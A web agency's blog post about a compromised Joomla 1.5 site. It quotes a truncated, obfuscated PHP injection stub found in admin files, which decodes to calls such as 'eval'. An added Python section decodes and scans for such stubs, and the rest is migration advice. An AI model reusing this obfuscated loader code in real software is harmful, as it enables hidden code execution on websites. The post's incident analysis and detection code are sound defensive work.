Hacked Joomla websites are on the rise! Since Joomla 1.5 reached End of Life on April 11, 2012 we have been seeing more and more instances of plundered and violated websites appearing.

While drafting up a proposal for a client migration I ran an audit on their current site. I was planning to make a note of all extensions installed and point out which, if any, were at risk. Much to my surprise I discovered that the admin did not function and instead I received the following PHP error (the full path has been edited for anonymity):

Fatal error: Cannot redeclare XTW6QUo() (previously declared in /path/administrator/index.php:188) in /path/administrator/templates/khepri/index.php on line 223

We currently have a large number of hosted clients (somewhere around 120 clients). Most of these have chosen to host with us for peace of mind. Some have also taken out a support contract to ensure their website is looked after. This particular client has no support package in place and is hosted elsewhere.

3rd Party Hosting

Some clients come to us and are already hosted with a 3rd Party. We don’t like 3rd parties. We have no experience with these hosts so cannot vouch for them.  We host with Heart Internet and know what they run. We trust their knowledge and rely on their support. If you host your site with a different host it complicates matters. Especially when they will not let us contact them on your behalf.

This client was hosted with another host; a rather large, well-known host. We have had dealings with these guys in the past and found their servers and conduct very poor. They will remain anonymous…

The hack

Unable to conduct my audit I took a backup of the site via FTP to examine the files.

The site was running the final release of Joomla version 1.5.26. It is most likely that one of the extensions installed was the cause of the exploit. As I do not have access to the server logs I cannot guess when the hack took place or what it is actually doing.

The malicious code

Inserted at the bottom of countless admin pages is some kind of PHP function. I have not included the full code.

<?php /*16*/ function XTW6QUo($efAyyetq){$aff=array(0,97,98,99,100,101,108,115,118,105,110,111,117,109,112,114);$stf='';$efAYytetq=0;while($efAYytetq<8){if($aff[$efAyyetq-(($efAyyetq>>4)<<4)]){$stf.=chr($aff[$efAyyetq-(($efAyyetq>>4)<<4)]);}$efAyyetq=$efAyyetq>>4;$efAYytetq++;}return$stf;}$_________=XTW6QUo(24965);$_________ ...
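The stub above can be read without running any PHP. The following is an added example, not code from the original post: it ports the stub's nibble-table loop to Python, decodes the integer arguments passed to it, and walks a site backup for files carrying a stub of the same shape, which also covers variants with a different function name or table. The names `decode`, `analyse`, `scan_tree` and `demo`, and the two-file sample backup, are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Stub header as it appears in the post: function NAME($arg){$var=array(<ints>)
STUB_RE = re.compile(
    r"function\s+(\w+)\s*\(\s*\$\w+\s*\)\s*\{\s*\$\w+\s*=\s*array\(([\d,\s]+)\)")

# Excerpt copied from the post (cut where the post cuts it); handled as data only.
SAMPLE = (
    r"<?php /*16*/ function XTW6QUo($efAyyetq){$aff=array(0,97,98,99,100,101,"
    r"108,115,118,105,110,111,117,109,112,114);$stf='';$efAYytetq=0;"
    r"while($efAYytetq<8){if($aff[$efAyyetq-(($efAyyetq>>4)<<4)]){$stf.="
    r"chr($aff[$efAyyetq-(($efAyyetq>>4)<<4)]);}$efAyyetq=$efAyyetq>>4;"
    r"$efAYytetq++;}return$stf;}$_________=XTW6QUo(24965);")

def decode(value, table, rounds=8):
    """Port of the stub's loop: each 4-bit nibble of value, lowest first,
    indexes the table of character codes; a zero entry emits nothing."""
    padded = list(table) + [0] * 16   # tolerate tables shorter than 16 entries
    codes = (padded[(value >> (4 * i)) & 0xF] for i in range(rounds))
    return "".join(chr(c) for c in codes if c)

def analyse(source):
    """Return [(stub_name, [decoded call arguments])] without running any PHP."""
    findings = []
    for name, raw in STUB_RE.findall(source):
        table = [int(n) for n in raw.split(",") if n.strip()]
        calls = re.findall(r"\b%s\(\s*(\d+)\s*\)" % re.escape(name), source)
        findings.append((name, [decode(int(c), table) for c in calls]))
    return findings

def scan_tree(root):
    """Walk a site backup and map each infected .php file to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = analyse(path.read_text(errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Constructed two-file backup: one clean page, one carrying the excerpt."""
    with tempfile.TemporaryDirectory() as tmp:
        admin = Path(tmp, "administrator")
        admin.mkdir()
        (admin / "clean.php").write_text("<?php echo 'ok';")
        (admin / "index.php").write_text("<?php echo 'ok'; ?>\n" + SAMPLE)
        return scan_tree(tmp)
```

Pointing `scan_tree` at the directory holding the FTP backup lists every PHP file that carries a stub, together with the strings its calls decode to.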

Where does the client stand?

I have previously posted about recovering from an iframe Joomla hack. There are a large number of posts out there covering what to do in case you have been exploited or defaced:  http://docs.joomla.org/Security_Checklist_7.

Fortunately I have a backup of the site from 3 months prior when we were contracted to perform some remedial work. I am, however, dubious about restoring the site on the existing host as I fear it will only be exploited again. We would charge the client a nominal rate for the data recovery and restore but this would most likely only be a short term fix.

The ideal solution

Fixing this Joomla hack would require the site to be cleaned and then migrated to the latest supported release. This would be done on a localhost to avoid the site being publicly visible.

Even if we were to restore this site from a clean backup there is no guarantee that it will not be compromised again. The safest route is to go with a clean install of Joomla 2.5.x or 3.1.x.

What version of Joomla should you use?

http://docs.joomla.org/What_version_of_Joomla!_should_you_use%3F

All users are advised to either migrate to version 2.5.x (the current long-term support release) or to version 3.1.x (the latest short-term release).

Version 3.1 is stable enough for production sites and is recommended unless you need any functionality that is only available on the 2.5.x platform. See the development status here: http://developer.joomla.org/development-status.html

How long is each version supported?

Extract taken from: http://docs.joomla.org/Joomla_3_FAQ

The 3.x series will have over 4 years of support as well. This of course is taking into account all the STS versions, 3.0 to 3.1 then 3.2 which will only have 7 months of support each, followed by last version, 3.5. The final version of the 3.x series will be Joomla! 3.5, an LTS version, planned for release in March of 2014 with support until the end of 2016. All of the Joomla! 3.x versions will be one-click upgrades and should, overall, be smooth transitions for users and developers as the 2.x series was.

Essentially what this is saying is that the newer platforms are far less painful to update than the older 1.5.x platform. The new platforms include an automatic updater.

As long as there are no heavy customisations made to the coding of the site future updates could (in theory) be done by anyone with admin privileges.

Conclusion

In summary this has shown that it is better to plan for the worst scenario rather than wait for the inevitable. No software is infallible. Without regular security patches your site will eventually fall foul of some newly discovered exploit.

Website security has been highlighted in the press recently due to large organised attacks. The BBC reported on the WordPress botnet in April (http://www.bbc.co.uk/news/technology-22152296), a botnet that also went on to target other CMS-based sites.

If you are still stuck on an older version of Joomla and have not yet decided to go ahead with the migration of your Joomla 1.5.x site we want to ask you this question:

Your data is your business. Just how much is it worth to you?